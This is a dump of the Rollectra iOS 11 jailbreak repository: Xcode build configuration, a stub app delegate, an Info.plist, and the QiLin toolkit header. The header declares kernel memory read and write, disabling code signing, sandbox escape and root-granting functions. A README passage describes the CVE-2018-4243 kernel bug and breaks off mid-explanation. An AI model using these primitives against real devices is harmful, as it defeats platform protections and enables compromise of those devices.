0; 317 | GCC_PREPROCESSOR_DEFINITIONS = ( 318 | "DEBUG=1", 319 | "$(inherited)", 320 | ); 321 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 322 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 323 | GCC_WARN_UNDECLARED_SELECTOR = YES; 324 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 325 | GCC_WARN_UNUSED_FUNCTION = YES; 326 | GCC_WARN_UNUSED_VARIABLE = YES; 327 | IPHONEOS_DEPLOYMENT_TARGET = 11.4; 328 | MTL_ENABLE_DEBUG_INFO = YES; 329 | ONLY_ACTIVE_ARCH = YES; 330 | SDKROOT = iphoneos; 331 | }; 332 | name = Debug; 333 | }; 334 | 21C0FC7C21369EB800849420 /* Release */ = { 335 | 
isa = XCBuildConfiguration; 336 | buildSettings = { 337 | ALWAYS_SEARCH_USER_PATHS = NO; 338 | CLANG_ANALYZER_NONNULL = YES; 339 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 340 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++14"; 341 | CLANG_CXX_LIBRARY = "libc++"; 342 | CLANG_ENABLE_MODULES = YES; 343 | CLANG_ENABLE_OBJC_ARC = YES; 344 | CLANG_ENABLE_OBJC_WEAK = YES; 345 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 346 | CLANG_WARN_BOOL_CONVERSION = YES; 347 | CLANG_WARN_COMMA = YES; 348 | CLANG_WARN_CONSTANT_CONVERSION = YES; 349 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 350 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 351 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 352 | CLANG_WARN_EMPTY_BODY = YES; 353 | CLANG_WARN_ENUM_CONVERSION = YES; 354 | CLANG_WARN_INFINITE_RECURSION = YES; 355 | CLANG_WARN_INT_CONVERSION = YES; 356 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 357 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 358 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 359 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 360 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 361 | CLANG_WARN_STRICT_PROTOTYPES = YES; 362 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 363 | CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 364 | CLANG_WARN_UNREACHABLE_CODE = YES; 365 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 366 | CODE_SIGN_IDENTITY = "iPhone Developer"; 367 | COPY_PHASE_STRIP = NO; 368 | DEBUG_INFORMATION_FORMAT = "dwarf-with-dsym"; 369 | ENABLE_NS_ASSERTIONS = NO; 370 | ENABLE_STRICT_OBJC_MSGSEND = YES; 371 | GCC_C_LANGUAGE_STANDARD = gnu11; 372 | GCC_NO_COMMON_BLOCKS = YES; 373 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 374 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 375 | GCC_WARN_UNDECLARED_SELECTOR = YES; 376 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 377 | GCC_WARN_UNUSED_FUNCTION = YES; 378 | GCC_WARN_UNUSED_VARIABLE = YES; 379 | IPHONEOS_DEPLOYMENT_TARGET = 11.4; 380 | MTL_ENABLE_DEBUG_INFO = NO; 381 | SDKROOT = iphoneos; 382 | VALIDATE_PRODUCT = YES; 383 | 
}; 384 | name = Release; 385 | }; 386 | 21C0FC7E21369EB800849420 /* Debug */ = { 387 | isa = XCBuildConfiguration; 388 | buildSettings = { 389 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 390 | CODE_SIGN_IDENTITY = "iPhone Developer"; 391 | CODE_SIGN_STYLE = Manual; 392 | DEVELOPMENT_TEAM = ""; 393 | ENABLE_BITCODE = NO; 394 | FRAMEWORK_SEARCH_PATHS = ( 395 | "$(inherited)", 396 | "$(PROJECT_DIR)/Rollectra", 397 | ); 398 | INFOPLIST_FILE = Rollectra/Info.plist; 399 | IPHONEOS_DEPLOYMENT_TARGET = 11.3; 400 | LD_RUNPATH_SEARCH_PATHS = ( 401 | "$(inherited)", 402 | "@executable_path/Frameworks", 403 | ); 404 | OTHER_CFLAGS = ""; 405 | OTHER_LDFLAGS = ( 406 | "-framework", 407 | IOKit, 408 | "$(SRCROOT)/Rollectra/qilin.o", 409 | ); 410 | PRODUCT_BUNDLE_IDENTIFIER = "science.xnu.rollectra-jailed"; 411 | PRODUCT_NAME = "$(TARGET_NAME)"; 412 | PROVISIONING_PROFILE_SPECIFIER = ""; 413 | TARGETED_DEVICE_FAMILY = "1,2"; 414 | }; 415 | name = Debug; 416 | }; 417 | 21C0FC7F21369EB800849420 /* Release */ = { 418 | isa = XCBuildConfiguration; 419 | buildSettings = { 420 | ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; 421 | CODE_SIGN_IDENTITY = "iPhone Developer"; 422 | CODE_SIGN_STYLE = Manual; 423 | DEVELOPMENT_TEAM = ""; 424 | ENABLE_BITCODE = NO; 425 | FRAMEWORK_SEARCH_PATHS = ( 426 | "$(inherited)", 427 | "$(PROJECT_DIR)/Rollectra", 428 | ); 429 | INFOPLIST_FILE = Rollectra/Info.plist; 430 | IPHONEOS_DEPLOYMENT_TARGET = 11.3; 431 | LD_RUNPATH_SEARCH_PATHS = ( 432 | "$(inherited)", 433 | "@executable_path/Frameworks", 434 | ); 435 | OTHER_CFLAGS = ""; 436 | OTHER_LDFLAGS = ( 437 | "-framework", 438 | IOKit, 439 | "$(SRCROOT)/Rollectra/qilin.o", 440 | ); 441 | PRODUCT_BUNDLE_IDENTIFIER = "science.xnu.rollectra-jailed"; 442 | PRODUCT_NAME = "$(TARGET_NAME)"; 443 | PROVISIONING_PROFILE_SPECIFIER = ""; 444 | TARGETED_DEVICE_FAMILY = "1,2"; 445 | }; 446 | name = Release; 447 | }; 448 | /* End XCBuildConfiguration section */ 449 | 450 | /* Begin XCConfigurationList section */ 
451 | 21C0FC6221369EB700849420 /* Build configuration list for PBXProject "Rollectra" */ = { 452 | isa = XCConfigurationList; 453 | buildConfigurations = ( 454 | 21C0FC7B21369EB800849420 /* Debug */, 455 | 21C0FC7C21369EB800849420 /* Release */, 456 | ); 457 | defaultConfigurationIsVisible = 0; 458 | defaultConfigurationName = Release; 459 | }; 460 | 21C0FC7D21369EB800849420 /* Build configuration list for PBXNativeTarget "Rollectra" */ = { 461 | isa = XCConfigurationList; 462 | buildConfigurations = ( 463 | 21C0FC7E21369EB800849420 /* Debug */, 464 | 21C0FC7F21369EB800849420 /* Release */, 465 | ); 466 | defaultConfigurationIsVisible = 0; 467 | defaultConfigurationName = Release; 468 | }; 469 | /* End XCConfigurationList section */ 470 | }; 471 | rootObject = 21C0FC5F21369EB700849420 /* Project object */; 472 | } 473 | -------------------------------------------------------------------------------- /Rollectra.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Rollectra.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Rollectra.xcodeproj/xcuserdata/pwn20wnd.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | Rollectra.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /Rollectra/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // Rollectra 4 | // 5 | 
// Created by pwn20wnd on 8/29/18.
// Copyright © 2018 Pwn20wnd. All rights reserved.
//

#import <UIKit/UIKit.h>

/// Application delegate. Holds the key window; all real work happens elsewhere.
@interface AppDelegate : UIResponder <UIApplicationDelegate>

@property (strong, nonatomic) UIWindow *window;

@end

--------------------------------------------------------------------------------
/Rollectra/AppDelegate.m:
--------------------------------------------------------------------------------
//
//  AppDelegate.m
//  Rollectra
//
//  Created by pwn20wnd on 8/29/18.
//  Copyright © 2018 Pwn20wnd. All rights reserved.
//

#import "AppDelegate.h"

@interface AppDelegate ()

@end

@implementation AppDelegate

#pragma mark - Launch and termination

/// Called once UIKit has finished launching the process.
/// No launch-time setup is done here; returning YES simply lets UIKit load the
/// main storyboard named in Info.plist (UIMainStoryboardFile = Main).
- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
    return YES;
}

/// Process is about to exit. Nothing is persisted from the delegate.
- (void)applicationWillTerminate:(UIApplication *)application {
}

#pragma mark - Foreground / background transitions

/// Active -> inactive (interruption, or start of a move to the background). No-op.
- (void)applicationWillResignActive:(UIApplication *)application {
}

/// App has moved to the background. No state is saved and no work is paused here.
- (void)applicationDidEnterBackground:(UIApplication *)application {
}

/// Background -> foreground transition. No-op.
- (void)applicationWillEnterForeground:(UIApplication *)application {
}

/// App became active again. No-op.
- (void)applicationDidBecomeActive:(UIApplication *)application {
}

@end
--------------------------------------------------------------------------------
/Rollectra/AppIcon20x20.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon20x20.png
--------------------------------------------------------------------------------
/Rollectra/AppIcon20x20@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon20x20@2x.png
--------------------------------------------------------------------------------
/Rollectra/AppIcon20x20@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon20x20@3x.png
--------------------------------------------------------------------------------
/Rollectra/AppIcon29x29.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon29x29.png -------------------------------------------------------------------------------- /Rollectra/AppIcon29x29@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon29x29@2x.png -------------------------------------------------------------------------------- /Rollectra/AppIcon29x29@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon29x29@3x.png -------------------------------------------------------------------------------- /Rollectra/AppIcon40x40.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon40x40.png -------------------------------------------------------------------------------- /Rollectra/AppIcon40x40@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon40x40@2x.png -------------------------------------------------------------------------------- /Rollectra/AppIcon40x40@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon40x40@3x.png -------------------------------------------------------------------------------- /Rollectra/AppIcon60x60@2x.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon60x60@2x.png -------------------------------------------------------------------------------- /Rollectra/AppIcon60x60@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon60x60@3x.png -------------------------------------------------------------------------------- /Rollectra/AppIcon76x76.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon76x76.png -------------------------------------------------------------------------------- /Rollectra/AppIcon76x76@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/AppIcon76x76@2x.png -------------------------------------------------------------------------------- /Rollectra/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "20x20", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "20x20", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "29x29", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "29x29", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "40x40", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "40x40", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "iphone", 35 | "size" : "60x60", 36 | "scale" : "2x" 37 | }, 38 | { 39 | "idiom" : "iphone", 40 | "size" : "60x60", 41 | "scale" : "3x" 42 | 
}, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "20x20", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "20x20", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "29x29", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "29x29", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "idiom" : "ipad", 65 | "size" : "40x40", 66 | "scale" : "1x" 67 | }, 68 | { 69 | "idiom" : "ipad", 70 | "size" : "40x40", 71 | "scale" : "2x" 72 | }, 73 | { 74 | "idiom" : "ipad", 75 | "size" : "76x76", 76 | "scale" : "1x" 77 | }, 78 | { 79 | "idiom" : "ipad", 80 | "size" : "76x76", 81 | "scale" : "2x" 82 | }, 83 | { 84 | "idiom" : "ipad", 85 | "size" : "83.5x83.5", 86 | "scale" : "2x" 87 | }, 88 | { 89 | "idiom" : "ios-marketing", 90 | "size" : "1024x1024", 91 | "scale" : "1x" 92 | } 93 | ], 94 | "info" : { 95 | "version" : 1, 96 | "author" : "xcode" 97 | } 98 | } -------------------------------------------------------------------------------- /Rollectra/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "version" : 1, 4 | "author" : "xcode" 5 | } 6 | } -------------------------------------------------------------------------------- /Rollectra/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /Rollectra/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 35 | 36 | 37 | 38 | 44 | 51 | 52 | 53 | 54 | 55 | 56 | 62 | 69 | 70 | 71 | 72 | 73 | 74 | 91 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 109 | 115 | 116 | 117 | 118 | 119 
| 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 | 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | -------------------------------------------------------------------------------- /Rollectra/Combined Shape.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/Combined Shape.png -------------------------------------------------------------------------------- /Rollectra/Combined Shape@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/Combined Shape@2x.png -------------------------------------------------------------------------------- /Rollectra/Combined Shape@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/pwn20wndstuff/Rollectra11/535b66ef7c1637d5749a894f346e36cc3dd184f9/Rollectra/Combined Shape@3x.png -------------------------------------------------------------------------------- /Rollectra/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | $(DEVELOPMENT_LANGUAGE) 7 | CFBundleDisplayName 8 | Rollectra / SemiRestore11 9 | CFBundleExecutable 10 | $(EXECUTABLE_NAME) 11 | CFBundleIcons 12 | 13 | CFBundlePrimaryIcon 14 | 15 | CFBundleIconFiles 16 | 17 | AppIcon29x29 18 | AppIcon40x40 19 | AppIcon60x60 20 | 21 | UIPrerenderedIcon 22 | 23 | 24 | 25 | CFBundleIcons~ipad 26 | 27 | CFBundlePrimaryIcon 28 | 29 | CFBundleIconFiles 30 | 31 | AppIcon29x29 32 | AppIcon40x40 33 | AppIcon60x60 34 | AppIcon50x50 35 | AppIcon76x76 36 | 37 | UIPrerenderedIcon 38 | 39 | 40 | 41 | CFBundleIdentifier 42 | 
$(PRODUCT_BUNDLE_IDENTIFIER) 43 | CFBundleInfoDictionaryVersion 44 | 6.0 45 | CFBundleName 46 | $(PRODUCT_NAME) 47 | CFBundlePackageType 48 | APPL 49 | CFBundleShortVersionString 50 | 1.2 51 | CFBundleVersion 52 | 1 53 | LSApplicationQueriesSchemes 54 | 55 | tweetbot 56 | twitterrific 57 | tweetings 58 | twitter 59 | 60 | LSRequiresIPhoneOS 61 | 62 | UILaunchStoryboardName 63 | LaunchScreen 64 | UIMainStoryboardFile 65 | Main 66 | UIRequiredDeviceCapabilities 67 | 68 | armv7 69 | 70 | UISupportedInterfaceOrientations 71 | 72 | UIInterfaceOrientationPortrait 73 | 74 | UISupportedInterfaceOrientations~ipad 75 | 76 | UIInterfaceOrientationPortrait 77 | UIInterfaceOrientationPortraitUpsideDown 78 | UIInterfaceOrientationLandscapeLeft 79 | UIInterfaceOrientationLandscapeRight 80 | 81 | UIViewControllerBasedStatusBarAppearance 82 | 83 | 84 | 85 | -------------------------------------------------------------------------------- /Rollectra/QiLin.h: -------------------------------------------------------------------------------- 1 | // 2 | // jjt.h 3 | // QiLin 4 | // 5 | // Created by JL on 12/7/17. 6 | // Copyright © 2017 NewOSXBook. All rights reserved. 7 | 8 | // Revision 3: Added spawnAndPlatformize(), 9 | // moved to posix_spawn() implementation for exec() family 10 | // actually exported the set*Reporter functions (formerly ErrorHandler.. etc - 11 | // "Reporter" is more accurate, because they allow you to propagate messages to 12 | // a GUI. 13 | // 14 | // Revision 4: Added kexec (executeInKernel) 15 | // 16 | // Revision 5: KMR/KMW (Kernel memory read/write) functions weren't exported! Oops! 
17 | // 18 | // Revision 6: RootFS mount, fixed bug in getting symbols (no longer needs setKernelSymbol) 19 | // and added respring 20 | // and also added uint64_t getVnodeByPathName (char *Path) ; 21 | // 22 | // (Almost) free to use (ABSE) per the license in http://NewOSXBook.com/QiLin/ 23 | // 24 | // Remember to give credit where due and please tweet with #QiLin 25 | // so others can quickly find your JailBreak or other project. 26 | // 27 | 28 | #if 0 29 | Johnny's (semi) open source license, v0.4 30 | ----------------------------------------- 31 | 32 | This is (well, will be, at the time of writing) open source, and I can't but appeal to your sense of decency. 33 | You might try compile this and try to pass it as your own. Heck, you might even try to run it through llvm-obfuscator. 34 | But that would be stealing code. And obfuscate as you will, you can't obfuscate enough to hide the methods. 35 | So, primum non nocere. Do no harm, and do not steal. 36 | 37 | To be fully clear: 38 | 39 | - Yes, you may use this source or code library as you see fit, PROVIDED THAT: 40 | 41 | - IT IS NOT USED COMMERCIALLY IN ANY WAY. For this, I ask that you contact my company, @Technologeeks, 42 | and ask for proper licensing - they'll also provide official support. 43 | 44 | - IT IS NOT USED AS A COMPONENT OF AN APT IN ANY KIND FORM OR MANNER. 45 | (NSO/Hackin9/Finfisher/Equus/etc - that means you) 46 | 47 | - WHEN YOU DO USE IT, I ASK THAT YOU MENTION THAT YOUR TOOL IS "powered by the QiLin Toolkit", 48 | or otherwise provide a user facing indication that it is using this code. 49 | I'd appreciate it if you tweeted with #QiLin, too. 50 | 51 | - If you spread lies about other people, propaganda or false claims, while using this toolkit, 52 | then you must renounce your ways, and apologize. Then you can use it freely. 53 | 54 | - There are no limitation on nationality, specific people exclusions (i.e. 
this is AISE, subject to last condition, above ;-), 55 | or any other race, color or creed - provided the above are met. 56 | 57 | 58 | - QiLin comes with NO LIABILITY WHATSOEVER. YOU USE THIS AT YOUR OWN RISK. 59 | 60 | I CANNOT AND WILL NOT BE HELD ACCOUNTABLE FOR ANY DAMAGE, SOFTWARE OR HARDWARE OR YOUR DATA OR OTHERWISE, 61 | 62 | WHICH MAY OR MAY NOT RESULT TO YOUR IOS DEVICE BY USING THIS. 63 | 64 | - Remember I'm doing this AS A FAVOR. I AM NO IN WAY INDEBTED OR COMMITTED TO SUPPORT THIS, OR ANY OTHER OF MY TOOLS. 65 | You don't have to thank for this (you're welcome) but please don't slander me either. 66 | 67 | - Should you wish to contribute/donate, you may do so in one of the following ways: 68 | 69 | - Monetary: Pick a charity. Any charity. Of your choice. Pay them however money you want. 70 | Optionally, tweet/fb/insta/snap-whatever a screen capture stating "#QiLin". 71 | 72 | - Development: Through http://NewOSXBook.com/forum - you are welcome to ask (proper technical, not lame wen eta) 73 | questions and engage in discussions 74 | 75 | 76 | 77 | First, do no harm. Next, have fun :-) 78 | 79 | Changelog: 80 | 81 | - v0.1 Was AISE but SE is being more of an ass than usual and slandering fake claims directly attacking me. 82 | So this was updated with new condition excluding him until he grows up and behaves like the decent, 83 | talented researcher he can be. 84 | 85 | - v0.3 adds request to tweet #QiLin. 
86 | 87 | - v0.4 states what should be obvious - NO LIABILITY WHATSOEVER 88 | #endif 89 | #ifndef qilin_h 90 | #define qilin_h 91 | #include 92 | #include 93 | #include 94 | 95 | 96 | char *getMachine (void); 97 | char *getOSVer(void); 98 | 99 | typedef int (*KMRFunc)(uint64_t Address, uint64_t Len, void **To); 100 | typedef int (*KMWFunc)(uint64_t Address, uint64_t Len, void *From); 101 | void setKernelMemoryReadFunction(KMRFunc F); 102 | void setKernelMemoryWriteFunction(KMWFunc F); 103 | 104 | 105 | // MUST call either initQiLin variant first - with or without TFP0, though, that's your call. 106 | 107 | int initQiLin (mach_port_t TFP0, uint64_t KernelBase); 108 | int initQiLinWithKMRW(uint64_t KernelBase, KMRFunc Kmr, KMWFunc Kmw); 109 | int initQilinWithTFP0AndMyTaskPortAddr(mach_port_t TFP0, uint64_t MyTaskPortAddr); 110 | 111 | 112 | // System wide effects 113 | // 114 | int remountRootFS (void); 115 | int reSpring (void); // @FCE365 - this is for you 116 | 117 | pid_t execCommand(char *Cmd, char *Arg1, char *Arg2, char *Arg3, char *Arg4, char *Arg5 , int Flags); 118 | int execCommandAndWait(char *Cmd, char *Arg1, char *Arg2, char *Arg3, char *Arg4, char *Arg5); 119 | 120 | int setTFP0AsHostSpecialPort4 (void); 121 | 122 | // 1/17/18 - This is super useful 123 | int spawnAndPlatformize (char *AmfidebPath, char *Arg1, char *Arg2, char *Arg3 , char *Arg4, char *Arg5); 124 | int spawnAndShaiHulud (char *AmfidebPath, char *Arg1, char *Arg2, char *Arg3 , char *Arg4, char *Arg5); 125 | 126 | 127 | int moveFileFromAppDir (char *File, char *Dest); 128 | int disableAutoUpdates(void); 129 | 130 | // Code signing 131 | 132 | // Will set AMFId's exception ports and thereby disable code signing 133 | // 134 | int castrateAmfid (void); 135 | 136 | // Utility function - you probably won't need this directly. 
137 | #define ALGORITHM_SHA256 2 138 | #define ALGORITHM_SHA1 1 139 | char *cdHashOfFile(char *fileName,int Algorithm); // Calculate CDHash of a given Mach-O (for messing with AMFI) 140 | 141 | 142 | 143 | // Kernel Memory access (wrappers over kernel_task send right) 144 | uint64_t findKernelSymbol (char *Symbol); 145 | void setKernelSymbol (char *Symbol, uint64_t Address); // NOTE: "_kernproc", not "kernproc" 146 | 147 | int readKernelMemory(uint64_t Address, uint64_t Len, void **To); 148 | int writeKernelMemory(uint64_t Address, uint64_t Len, void *From); 149 | 150 | // 03/20/2018: Kernel execution 151 | 152 | int kexec(uint64_t Address, uint64_t Arg0, uint64_t Arg1,uint64_t Arg2,uint64_t Arg3,uint64_t Arg4,uint64_t Arg5,uint64_t Arg6); 153 | 154 | 155 | // 03/20/2018 156 | uint64_t getAddressOfPort(pid_t Pid, mach_port_name_t Port); 157 | 158 | // 06/15/2018 ------- 159 | // Will return the address of the kernel vnode representing Path. 160 | uint64_t getVnodeByPathName (char *Path) ; 161 | uint64_t getRootVnodeAddr(void); // Convenience, for rootvnode ("/") instead of _rootvnode sym deref 162 | 163 | //------------------- 164 | 165 | // Not recommended, but doable: Bestow task port of Pid in TargetPid 166 | mach_port_t task_for_pid_in_kernel (pid_t Pid, pid_t TargetPid); 167 | 168 | //-------------------------------------- 169 | 170 | // Process manipulation functions 171 | 172 | // Finds the address of struct proc for this pid_t in kernel memory. 173 | uint64_t getProcStructForPid(pid_t); 174 | 175 | // Finds the pid of a process given its (base) name. 
Note this will only 176 | // work on processes you are the owner of (or all, if root) - this is intentional 177 | pid_t findPidOfProcess (char *ProcName) ; 178 | 179 | int setCSFlagsForProcAtAddr(uint64_t ProcStructAddr, int Flags, int Set); 180 | int setCSFlagsForPid (pid_t Whom, uint32_t Flags); 181 | int platformizePid(pid_t Whom); 182 | int rootifyPid(pid_t Whom); 183 | int ShaiHuludPid (pid_t Whom, uint64_t CredAddr); // leave 0 for root creds. 184 | int unShaiHuludPid (pid_t Whom); 185 | 186 | 187 | 188 | uint64_t borrowEntitlementsFromDonor(char *UnwittingDonor, char *Arg); 189 | // By request :-) 190 | uint64_t borrowEntitlementsFromPid(pid_t Pid); 191 | 192 | 193 | 194 | // Presently, limited to two entitlements, and assumed boolean (true) 195 | int entitlePidWithKernelEnts (pid_t Whom, char *Ent1, char *Ent2); 196 | 197 | // Convenience functions - do all the above , but on my process 198 | 199 | int platformizeMe (void); 200 | int rootifyMe(void); 201 | 202 | // Escape sandbox: 203 | // call with 0 to assume kernel cred, else specify value. Will return origCreds 204 | uint64_t ShaiHuludMe(uint64_t OtherCredsOr0ForKernelCreds); 205 | void unShaiHuludMe(uint64_t OrigCreds); 206 | int entitleMe(char *entitlementString); 207 | 208 | uint64_t getKernelCredAddr (void); 209 | 210 | 211 | /// Vnode functions - bringing @MinZheng's APFS bypass to the masses: 212 | uint64_t getVnodeByPathName (char *Path); 213 | 214 | /// Launchd handling utilities - just for you @launchderp :-) 215 | int makeLaunchdPlist (char *PlistName, char *Program, char *ProgramArguments, char *StandardOutputPath, char *StandardErrorPath, int RunAtLoad); 216 | int launjctlLaunchdPlist(char *Name); 217 | 218 | // I use these internally, not sure anyone else would need them 219 | int launjctlPrintSystem (void); 220 | int launjctlDumpState(void); 221 | 222 | 223 | // This one is still in progress. Don't use it please. 
224 | int movePortToPid(mach_port_t PortMoved, pid_t Pid, mach_port_name_t Name); 225 | int spawnJailbreakServer (char *Name, mach_port_t TFP0, mach_port_name_t NameInTarget); 226 | 227 | // UI Support: 228 | // Provide status, error and debug print outs to user, 229 | // which may be redirected to GUI views, etc. 230 | // Default implmenentations are NSLog. 231 | 232 | typedef void (status_func) (char *,...); 233 | void setStatusReporter (status_func *Func); 234 | void setErrorReporter (status_func *Func); 235 | void setDebugReporter (status_func *Func); 236 | 237 | 238 | // Utility functions you probably won't need unless you want to do your own debugging 239 | void hexDump(void *Mem, int Len, uint64_t Addr); 240 | void dumpARMThreadState64(_STRUCT_ARM_THREAD_STATE64 *old_state); 241 | 242 | // Even more Internal/advanced use: 243 | uint64_t findKernelTask (void); 244 | uint64_t findMyProcStructInKernelMemory(void); // For other advanced uses I haven't provided already 245 | 246 | 247 | #endif /* qilin_h */ 248 | -------------------------------------------------------------------------------- /Rollectra/README: -------------------------------------------------------------------------------- 1 | empty_list - exploit for p0 issue 1564 (CVE-2018-4243) iOS 11.0 - 11.3.1 kernel r/w 2 | @i41nbeer 3 | 4 | BUG: 5 | getvolattrlist takes a user controlled bufferSize argument via the fgetattrlist syscall. 6 | 7 | When allocating a kernel buffer to serialize the attr list to there's the following comment: 8 | 9 | /* 10 | * Allocate a target buffer for attribute results. 11 | * Note that since we won't ever copy out more than the caller requested, 12 | * we never need to allocate more than they offer. 
*/
ab.allocated = ulmin(bufferSize, fixedsize + varsize);
if (ab.allocated > ATTR_MAX_BUFFER) {
  error = ENOMEM;
  VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER);
  goto out;
}
MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK);

The problem is that the code doesn't then correctly handle the case when the user-supplied buffer size
is smaller than the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code:

/* Return attribute set output if requested. */
if (return_valid) {
